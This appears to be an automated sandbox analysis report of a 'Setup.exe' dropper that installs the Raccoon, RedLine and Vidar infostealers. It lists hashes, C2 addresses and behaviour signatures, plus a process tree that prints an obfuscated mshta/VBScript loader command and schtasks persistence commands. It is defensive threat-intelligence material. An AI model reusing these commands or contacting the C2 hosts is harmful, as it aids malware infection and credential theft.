Resubmissions

03-09-2021 12:16

210903-pfn3ysdac4 10

03-09-2021 04:55

210903-fj6mqsfbfk 10

02-09-2021 19:23

210902-x37sksbef5 10

02-09-2021 15:02

210902-senycadeck 10

02-09-2021 11:29

210902-4b2x2c3ahj 10

02-09-2021 05:46

210902-lng5vcn31n 10

02-09-2021 04:57

210902-gp7zs88ann 10

01-09-2021 17:32

210901-sgcvvtysvs 10

31-08-2021 12:57

210831-1v8aywj16x 10

31-08-2021 07:34

210831-n7h9w45r3x 10

Analysis

  • max time kernel
    72s
  • max time network
    269s
  • platform
    windows10_x64
  • resource
    win10-de
  • submitted
    02-09-2021 15:02

General

  • Target

    Setup.exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

raccoon

Botnet

d02c5d65069fc7ce1993e7c52edf0c9c4c195c81

Attributes
  • url4cnc

    https://telete.in/open3entershift

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

02_09_fat

C2

185.215.113.104:18754

Extracted

Family

vidar

Version

40.3

Botnet

937

C2

https://lenko349.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

1

C2

37.0.8.88:44263

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies system executable filetype association 2 TTPs 3 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 18 IoCs
  • Registers COM server for autorun 1 TTPs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar Stealer 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 7 IoCs
  • Themida packer 9 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 33 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4872
    • C:\Users\Admin\Documents\UjCTrEzIr_jaNUSK0mSWAIDm.exe
      "C:\Users\Admin\Documents\UjCTrEzIr_jaNUSK0mSWAIDm.exe"
      2⤵
        PID:2744
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 672
          3⤵
          • Program crash
          PID:5596
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 664
          3⤵
          • Program crash
          PID:5584
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 680
          3⤵
          • Program crash
          PID:368
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 656
          3⤵
          • Program crash
          PID:5156
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 1152
          3⤵
          • Program crash
          PID:6376
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 1112
          3⤵
          • Program crash
          PID:6368
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 1128
          3⤵
          • Program crash
          PID:6508
      • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
        "C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe"
        2⤵
          PID:2676
          • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
            C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
            3⤵
              PID:4884
            • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
              C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
              3⤵
                PID:1816
              • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                3⤵
                  PID:5392
                • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                  C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                  3⤵
                    PID:3140
                  • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                    C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                    3⤵
                      PID:4316
                    • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                      C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                      3⤵
                        PID:1968
                      • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                        C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                        3⤵
                          PID:4668
                        • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                          C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                          3⤵
                            PID:6188
                          • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                            C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                            3⤵
                              PID:6520
                            • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                              C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                              3⤵
                                PID:5484
                              • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                3⤵
                                  PID:6676
                                • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                  C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                  3⤵
                                    PID:6392
                                  • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                    C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                    3⤵
                                      PID:6328
                                    • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                      C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                      3⤵
                                        PID:3048
                                      • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                        C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                        3⤵
                                          PID:6336
                                        • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                          C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                          3⤵
                                            PID:7508
                                          • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                            C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                            3⤵
                                              PID:7956
                                            • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                              C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                              3⤵
                                                PID:1184
                                              • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                3⤵
                                                  PID:8076
                                                • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                  C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                  3⤵
                                                    PID:5932
                                                  • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                    C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                    3⤵
                                                      PID:4480
                                                    • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                      C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                      3⤵
                                                        PID:7284
                                                      • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                        C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                        3⤵
                                                          PID:8656
                                                        • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                          C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                          3⤵
                                                            PID:7948
                                                          • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                            C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                            3⤵
                                                              PID:5332
                                                            • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                              C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                              3⤵
                                                                PID:8392
                                                              • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                3⤵
                                                                  PID:8172
                                                                • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                  C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                  3⤵
                                                                    PID:9836
                                                                  • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                    C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                    3⤵
                                                                      PID:7832
                                                                    • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                      C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                      3⤵
                                                                        PID:6944
                                                                      • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                        C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                        3⤵
                                                                          PID:8220
                                                                        • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                          C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                          3⤵
                                                                            PID:8164
                                                                          • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                            C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                            3⤵
                                                                              PID:10768
                                                                            • C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                              C:\Users\Admin\Documents\exDWr226PQaXOEGwzpfE6If6.exe
                                                                              3⤵
                                                                                PID:8732
                                                                            • C:\Users\Admin\Documents\LqTbrK58kojFcJ4GPNAwpsC1.exe
                                                                              "C:\Users\Admin\Documents\LqTbrK58kojFcJ4GPNAwpsC1.exe"
                                                                              2⤵
                                                                                PID:1004
                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                  "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\LqTbrK58kojFcJ4GPNAwpsC1.exe"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """" == """" for %A IN ( ""C:\Users\Admin\Documents\LqTbrK58kojFcJ4GPNAwpsC1.exe"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )
                                                                                  3⤵
                                                                                    PID:3724
                                                                                • C:\Users\Admin\Documents\k7qBsgroSxY39uKAb7Mj4KSM.exe
                                                                                  "C:\Users\Admin\Documents\k7qBsgroSxY39uKAb7Mj4KSM.exe"
                                                                                  2⤵
                                                                                    PID:4472
                                                                                    • C:\Program Files (x86)\Company\NewProduct\inst001.exe
                                                                                      "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
                                                                                      3⤵
                                                                                        PID:3140
                                                                                      • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                        "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                        3⤵
                                                                                          PID:3224
                                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                          3⤵
                                                                                            PID:4740
                                                                                        • C:\Users\Admin\Documents\NF7C72dx7wPhJPtJ1h_5ql_o.exe
                                                                                          "C:\Users\Admin\Documents\NF7C72dx7wPhJPtJ1h_5ql_o.exe"
                                                                                          2⤵
                                                                                            PID:4440
                                                                                          • C:\Users\Admin\Documents\yNW6gyfWrJIxTyeUgWL3TpWu.exe
                                                                                            "C:\Users\Admin\Documents\yNW6gyfWrJIxTyeUgWL3TpWu.exe"
                                                                                            2⤵
                                                                                              PID:2652
                                                                                            • C:\Users\Admin\Documents\QfFMOswfVENhtcsSgrTkkNQ2.exe
                                                                                              "C:\Users\Admin\Documents\QfFMOswfVENhtcsSgrTkkNQ2.exe"
                                                                                              2⤵
                                                                                                PID:5076
                                                                                              • C:\Users\Admin\Documents\Omn7P4bfi2RhIXk3tJYC_Rlr.exe
                                                                                                "C:\Users\Admin\Documents\Omn7P4bfi2RhIXk3tJYC_Rlr.exe"
                                                                                                2⤵
                                                                                                  PID:8
                                                                                                • C:\Users\Admin\Documents\eXr2MzdtX47JKGdnLyRsvkgw.exe
                                                                                                  "C:\Users\Admin\Documents\eXr2MzdtX47JKGdnLyRsvkgw.exe"
                                                                                                  2⤵
                                                                                                    PID:4476
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 1668
                                                                                                      3⤵
                                                                                                      • Program crash
                                                                                                      PID:8776
                                                                                                  • C:\Users\Admin\Documents\2hqAbPjzjfPhu2BxRVWUzohA.exe
                                                                                                    "C:\Users\Admin\Documents\2hqAbPjzjfPhu2BxRVWUzohA.exe"
                                                                                                    2⤵
                                                                                                      PID:3788
                                                                                                    • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                      "C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1108
                                                                                                      • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                        C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                        3⤵
                                                                                                          PID:5368
                                                                                                        • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                          C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                          3⤵
                                                                                                            PID:6084
                                                                                                          • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                            C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:852
                                                                                                          • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                            C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                            3⤵
                                                                                                              PID:5256
                                                                                                            • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                              C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                              3⤵
                                                                                                                PID:4460
                                                                                                              • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                3⤵
                                                                                                                  PID:6008
                                                                                                                • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                  C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                  3⤵
                                                                                                                    PID:6268
                                                                                                                  • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                    C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                    3⤵
                                                                                                                      PID:6652
                                                                                                                    • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                      C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                      3⤵
                                                                                                                        PID:6304
                                                                                                                      • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                        C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                        3⤵
                                                                                                                          PID:6700
                                                                                                                        • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                          C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                          3⤵
                                                                                                                            PID:3872
                                                                                                                          • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                            C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                            3⤵
                                                                                                                              PID:6740
                                                                                                                            • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                              C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                              3⤵
                                                                                                                                PID:4392
                                                                                                                              • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                3⤵
                                                                                                                                  PID:7324
                                                                                                                                • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                  C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                  3⤵
                                                                                                                                    PID:7800
                                                                                                                                  • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                    C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                    3⤵
                                                                                                                                      PID:3800
                                                                                                                                    • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                      C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                      3⤵
                                                                                                                                        PID:7564
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 24
                                                                                                                                          4⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:3460
                                                                                                                                      • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                        C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                        3⤵
                                                                                                                                          PID:7448
                                                                                                                                        • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                          C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                          3⤵
                                                                                                                                            PID:4780
                                                                                                                                          • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                            C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                            3⤵
                                                                                                                                              PID:7892
                                                                                                                                            • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                              C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                              3⤵
                                                                                                                                                PID:8608
                                                                                                                                              • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                3⤵
                                                                                                                                                  PID:5440
                                                                                                                                                • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                  C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                  3⤵
                                                                                                                                                    PID:9140
                                                                                                                                                  • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                    C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                    3⤵
                                                                                                                                                      PID:8412
                                                                                                                                                    • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                      C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                      3⤵
                                                                                                                                                        PID:9160
                                                                                                                                                      • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                        C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                        3⤵
                                                                                                                                                          PID:9824
                                                                                                                                                        • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                          C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                          3⤵
                                                                                                                                                            PID:7136
                                                                                                                                                          • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                            C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                            3⤵
                                                                                                                                                              PID:6772
                                                                                                                                                            • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                              C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                              3⤵
                                                                                                                                                                PID:10004
                                                                                                                                                              • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                                C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:10284
                                                                                                                                                                • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                                  C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:10796
                                                                                                                                                                  • C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                                    C:\Users\Admin\Documents\Tpo_XFV5dRRNDa71tKqxkGjJ.exe
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:10872
                                                                                                                                                                  • C:\Users\Admin\Documents\OSXPhvvqU0oLUuu5OEQMTYXq.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\OSXPhvvqU0oLUuu5OEQMTYXq.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2104
                                                                                                                                                                    • C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5964
                                                                                                                                                                        • C:\Users\Admin\Documents\URAgfmp1QPSaCNJ_AAaRbT6l.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\URAgfmp1QPSaCNJ_AAaRbT6l.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:7548
                                                                                                                                                                          • C:\Users\Admin\Documents\QvSpaidpUbD5OwLFmgF9MChM.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\QvSpaidpUbD5OwLFmgF9MChM.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:7536
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6557837.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6557837.exe"
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:188
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\5807990.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\5807990.exe"
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:1464
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1070725.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1070725.exe"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:7928
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1908145.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1908145.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:7940
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:5592
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:5168
                                                                                                                                                                                • C:\Users\Admin\Documents\xi6d3ICWl8a51zTgaxqD5yA5.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\xi6d3ICWl8a51zTgaxqD5yA5.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:904
                                                                                                                                                                                • C:\Users\Admin\Documents\pJNxgenUFjrUggbaM_CnwYzh.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\pJNxgenUFjrUggbaM_CnwYzh.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:640
                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5260
                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:5300
                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5300.0.669033303\293814413" -parentBuildID 20200403170909 -prefsHandle 1496 -prefMapHandle 1472 -prefsLen 1 -prefMapSize 219808 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5300 "\\.\pipe\gecko-crash-server-pipe.5300" 1596 gpu
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:9672
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:8116
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=93.0.4577.63 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffd6290a380,0x7ffd6290a390,0x7ffd6290a3a0
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:9348
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
